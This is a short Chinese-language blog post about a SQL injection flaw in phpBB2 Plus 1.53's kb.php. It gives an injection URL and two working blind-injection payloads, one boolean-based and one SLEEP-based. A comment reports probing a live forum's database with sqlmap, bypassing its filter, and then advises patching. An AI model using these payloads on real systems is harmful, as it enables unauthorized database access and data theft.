PHPBB2 Plus 1.53 – “kb.php” SQL注入测试

漏洞来源:

http://www.securityfocus.com/bid/38828/info

 

漏洞分析:

phpBB2 Plus的SQL注入漏洞,因未在SQL查询中过滤用户提供的数据。

攻击者可能利用此漏洞破坏网站数据库,访问或修改数据,或者近一步利用底层数据库中的潜在漏洞。

 

影响版本:

phpBB2 Plus 1.53和其他版本

 

注入链接:

http://www.example.com/kb.php?mode=cat&cat=0

 

注入类型:

Type: boolean-based blind – OR boolean-based blind – WHERE or HAVING clause (MySQL comment)

Payload: mode=cat&cat=-3951 OR 7858=7858#

Type: AND/OR time-based blind – MySQL >= 5.0.12 OR time-based blind

Payload: mode=cat&cat=-1 OR SLEEP(5)

2 回复
    • hannesgao
      hannesgao says:

      已测试,可注入,用sqlmap可探测到数据库信息。探测到表名列表和某几个字段之后就停下了,理论上dump整个数据库只是时间问题。

      Kaforum的防注入系统对于sqlmap的tamper script没有任何防御效果,可以被轻松绕过。

      建议前辈把kaforum整站升级到较高的PHPBB版本,或者迁移到其他论坛平台。据我所知,PHPBB有插件可以把数据库整体迁移到PHPWIND。PHPBB已经是垂暮老人,现在好的BBS系统比比皆是。另外如果前辈用的是Strato的VPS,自己可以配置安全参数和安全措施的话,建议配置一下数据库的并发查询限制,这样可以有效防止sql注入尝试。

      我不是黑帽子,没有搞破坏的打算,所以写了这篇博客。

      回复

发表评论

Want to join the discussion?
Feel free to contribute!

发表评论

电子邮件地址不会被公开。 必填项已用*标注